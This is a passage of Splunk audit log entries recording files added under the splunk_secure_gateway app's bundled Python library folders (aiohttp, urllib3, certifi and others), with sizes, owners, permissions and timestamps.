action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_helpers.pyx", isdir=0, size=1049, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.302, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_helpers.pyi", isdir=0, size=202, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.298, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_helpers.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=308280, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.294, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_helpers.c", isdir=0, size=211989, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.291, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_headers.pxi", isdir=0, size=2007, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.287, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_frozenlist.pyx", isdir=0, size=2605, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.284, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_frozenlist.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=416712, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.280, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_frozenlist.c", isdir=0, size=294193, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.276, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_find_header.pxd", isdir=0, size=68, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.273, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_find_header.h", isdir=0, size=170, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.269, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_find_header.c", isdir=0, size=187570, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.265, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_cparser.pxd", isdir=0, size=3959, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.261, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:25.258, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__init__.py", isdir=0, size=6940, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.549, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout-3.0.1.dist-info/top_level.txt", isdir=0, size=14, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.544, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout-3.0.1.dist-info/WHEEL", isdir=0, size=92, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.538, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout-3.0.1.dist-info/RECORD", isdir=0, size=730, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.534, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout-3.0.1.dist-info/METADATA", isdir=0, size=4013, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.529, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout-3.0.1.dist-info/LICENSE", isdir=0, size=11357, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.523, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout-3.0.1.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.418, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle-2.0.0.dist-info/top_level.txt", isdir=0, size=11, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.412, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle-2.0.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.407, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle-2.0.0.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.402, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle-2.0.0.dist-info/RECORD", isdir=0, size=2139, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.396, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle-2.0.0.dist-info/METADATA", isdir=0, size=6661, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.391, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle-2.0.0.dist-info/LICENSE", isdir=0, size=1493, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.385, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle-2.0.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.379, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/__pycache__/sortedset.cpython-37.pyc", isdir=0, size=19697, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:24.373, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/__pycache__/sortedlist.cpython-37.pyc", isdir=0, size=61460, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:24.367, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/__pycache__/sorteddict.cpython-37.pyc", isdir=0, size=22537, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:24.363, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/__pycache__/__init__.cpython-37.pyc", isdir=0, size=2280, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:24.259, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/sortedset.py", isdir=0, size=19825, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.255, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/sortedlist.py", isdir=0, size=76331, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.250, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/sorteddict.py", isdir=0, size=22154, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.246, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:24.241, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers/__init__.py", isdir=0, size=2131, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.236, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi-2020.12.5.dist-info/top_level.txt", isdir=0, size=8, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.232, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi-2020.12.5.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.228, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi-2020.12.5.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.224, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi-2020.12.5.dist-info/RECORD", isdir=0, size=1034, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.216, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi-2020.12.5.dist-info/METADATA", isdir=0, size=2994, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.212, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi-2020.12.5.dist-info/LICENSE", isdir=0, size=1048, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.209, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi-2020.12.5.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.104, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics-2.1.0.dist-info/top_level.txt", isdir=0, size=11, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.099, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics-2.1.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.093, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics-2.1.0.dist-info/RECORD", isdir=0, size=3864, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.089, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics-2.1.0.dist-info/METADATA", isdir=0, size=1031, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.085, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics-2.1.0.dist-info/LICENSE.txt", isdir=0, size=1538, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.080, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics-2.1.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.075, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/types/oldstr.py", isdir=0, size=4332, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.071, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/types/olddict.py", isdir=0, size=2721, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.067, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/types/basestring.py", isdir=0, size=728, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:24.063, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/types/__init__.py", isdir=0, size=879, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.958, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/translation/__init__.py", isdir=0, size=17646, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.954, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/builtins/noniterators.py", isdir=0, size=9370, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.949, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/builtins/misc.py", isdir=0, size=2627, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.944, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/builtins/__init__.py", isdir=0, size=1805, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.940, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/utils/__init__.py", isdir=0, size=2633, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.936, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:23.932, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/types", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:23.928, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/translation", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:23.923, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/builtins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:23.919, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past/__init__.py", isdir=0, size=2918, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.914, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/subscription_pb2.cpython-37.pyc", isdir=0, size=34416, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.910, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/request_pb2.cpython-37.pyc", isdir=0, size=103353, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.907, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/nlp_splapp_request_pb2.cpython-37.pyc", isdir=0, size=5056, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.902, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/form_inputs_pb2.cpython-37.pyc", isdir=0, size=12642, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.898, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/event_handler_pb2.cpython-37.pyc", isdir=0, size=11748, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.894, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/envelope_pb2.cpython-37.pyc", isdir=0, size=5123, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.890, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/drone_mode_pb2.cpython-37.pyc", isdir=0, size=22344, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.886, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/common_pb2.cpython-37.pyc", isdir=0, size=45073, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.882, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/augmented_reality_pb2.cpython-37.pyc", isdir=0, size=19194, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.878, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__/__init__.cpython-37.pyc", isdir=0, size=161, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:23.772, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/subscription_pb2.py", isdir=0, size=103616, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.768, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/request_pb2.py", isdir=0, size=312691, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.764, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/public_instances_pb2.py", isdir=0, size=88518, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.760, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/nlp_splapp_request_pb2.py", isdir=0, size=12531, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.756, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/nlp_sds_request_pb2.py", isdir=0, size=11049, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.752, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/nlp_request_pb2.py", isdir=0, size=48100, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.746, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/nlp_ims_request_pb2.py", isdir=0, size=4965, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.739, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/form_inputs_pb2.py", isdir=0, size=39398, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.735, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/event_handler_pb2.py", isdir=0, size=35716, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.731, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/envelope_pb2.py", isdir=0, size=11479, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.726, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/drone_mode_pb2.py", isdir=0, size=67646, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.721, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/common_pb2.py", isdir=0, size=136417, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.716, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/augmented_reality_pb2.py", isdir=0, size=60155, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.712, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:23.707, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.503, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/bin/pysemver", isdir=0, size=209, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.498, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/bin/pasteurize", isdir=0, size=221, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.494, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/bin/futurize", isdir=0, size=219, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.489, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/bin/chardetect", isdir=0, size=225, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.484, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info/top_level.txt", isdir=0, size=8, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.481, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info/metadata.json", isdir=0, size=1857, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.477, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.473, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info/RECORD", isdir=0, size=6157, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.469, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info/METADATA", isdir=0, size=43414, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.466, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info/LICENSE.txt", isdir=0, size=1115, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.462, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.458, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info/DESCRIPTION.rst", isdir=0, size=41482, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.354, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_xrange_with_import.py", isdir=0, size=479, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.350, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_unicode_literals_import.py", isdir=0, size=367, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.346, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_unicode_keep_u.py", isdir=0, size=779, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_remove_old__future__imports.py", isdir=0, size=851, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.339, user=n/a, 